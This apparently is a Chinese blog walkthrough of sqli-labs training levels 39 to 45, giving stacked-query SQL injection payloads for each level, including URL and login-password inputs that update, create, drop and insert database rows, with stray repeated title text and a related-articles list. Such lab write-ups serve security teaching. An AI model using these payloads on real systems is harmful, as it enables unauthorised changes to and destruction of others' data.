less-39LESS-39-40-41-42-43-44-45
第39与38题的区别为本题id没有单引号。
输入:http://127.0.0.1/sqlilabs/Less-39/?id=1; update users set username=‘more’ where id=‘38’ --+(无单引号为错误)LESS-39-40-41-42-43-44-45LESS-39-40-41-42-43-44-45
LESS-40
LESS-39-40-41-42-43-44-45
本处的区别在于id为‘)闭合方式;
输入:http://127.0.0.1/sqlilabs/Less-40/?id=1’);create table food like users --+LESS-39-40-41-42-43-44-45LESS-39-40-41-42-43-44-45
LESS-41
此处与 less-39 是一致的,区别在于 41 错误不回显。所以我们称之为盲注LESS-39-40-41-42-43-44-45
输入:http://127.0.0.1/sqlilabs/Less-41/?id=1; drop table food --+LESS-39-40-41-42-43-44-45LESS-39-40-41-42-43-44-45
LESS-42
Update 更新数据后,经过 mysql_real_escape_string()处理后的数据,存入到数据库当中后不会发生变化。在 select 调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入,这关和二次注入的思路是不一样的。
本关从 login.php 源代码中分析可知:LESS-39-40-41-42-43-44-45LESS-39-40-41-42-43-44-45LESS-39-40-41-42-43-44-45Password 变量在 post 过程中,没有通过 mysql_real_escape_string()函数的处理
的时候密码选项我们可以进行 attack。
登录用户名随意
密码登录用以下的方式:bb’;create table less42 like users

输入:login_user=admin&login_password=bb’;create table less42 like users#LESS-39-40-41-42-43-44-45LESS-39-40-41-42-43-44-45
Less-43LESS-39-40-41-42-43-44-45
本关遇上一题的区别为:闭合方式改变
输入:password=bbb’);update food set price=100 where id=1#LESS-39-40-41-42-43-44-45LESS-39-40-41-42-43-44-45
LESS-44LESS-39-40-41-42-43-44-45
无错误提示;
输入:password=BBB’;insert into food(id,price,username) values (3,30,‘qq’)#LESS-39-40-41-42-43-44-45LESS-39-40-41-42-43-44-45LESS-45
和上面相同,不过闭合方式发生改变LESS-39-40-41-42-43-44-45
输入:password=bbb’);insert into food(id,price,username) values (2,60,‘book’)#LESS-39-40-41-42-43-44-45LESS-39-40-41-42-43-44-45

相关文章:

  • 2021-12-20
  • 2021-12-06
  • 2021-09-03
  • 2022-01-15
  • 2021-05-23
  • 2021-11-29
  • 2021-12-08
  • 2021-08-14
猜你喜欢
  • 2021-04-18
  • 2021-08-05
  • 2021-07-25
  • 2022-03-05
  • 2021-07-23
  • 2021-07-29
相关资源
相似解决方案